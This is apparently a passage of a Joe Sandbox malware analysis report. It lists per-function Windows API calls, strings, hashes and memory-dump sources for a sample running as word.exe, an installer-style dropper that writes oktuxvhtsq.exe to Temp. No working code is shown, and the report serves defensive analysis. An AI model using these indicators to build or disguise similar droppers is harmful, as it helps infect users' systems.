                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 123533781-2935972921
                                  • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                  • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                  • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                  • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                  • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                  • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                  • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: N$open$.B
                                  • API String ID: 3615053054-720656042
                                  • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                  • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                  • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                  • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,mrodzekle Setup,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F$mrodzekle Setup
                                  • API String ID: 941294808-3382217523
                                  • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                  • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                  • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                  • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • CloseHandle.KERNEL32(00000000), ref: 00405933
                                  • GetShortPathNameA.KERNEL32 ref: 0040593C
                                  • GetShortPathNameA.KERNEL32 ref: 00405959
                                  • wsprintfA.USER32 ref: 00405977
                                  • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                  • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                  • String ID: %s=%s$@!B$[Rename]
                                  • API String ID: 3445103937-2946522640
                                  • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                  • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                  • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                  • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                  • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000400), ref: 00405CDD
                                  • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000400), ref: 00405CF0
                                  • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                  • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 00405D3A
                                  • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                  • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                  • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 900638850-216748682
                                  • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                  • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                  • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                  • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                  • API String ID: 589700163-2943609387
                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                  • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                  • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                  • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                  • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00014A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                  • GlobalFree.KERNEL32(?), ref: 00402758
                                  • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                  • GlobalFree.KERNEL32(00000000), ref: 00402771
                                  • CloseHandle.KERNEL32(?), ref: 00402789
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID:
                                  • API String ID: 3294113728-0
                                  • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                  • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                  • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                  • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                  • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                  • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                  • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                  • SendMessageA.USER32 ref: 00404F18
                                  • SendMessageA.USER32 ref: 00404F32
                                  • SendMessageA.USER32 ref: 00404F40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                  • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                  • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                  • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                  • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                  • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                  • MulDiv.KERNEL32 ref: 00402BB4
                                  • wsprintfA.USER32 ref: 00402BC4
                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402BBE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                  • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                  • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                  • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                  • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                  • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                  • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                  • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                  • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                  • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                  • wsprintfA.USER32 ref: 004046EF
                                  • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                  • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                  • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                  • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
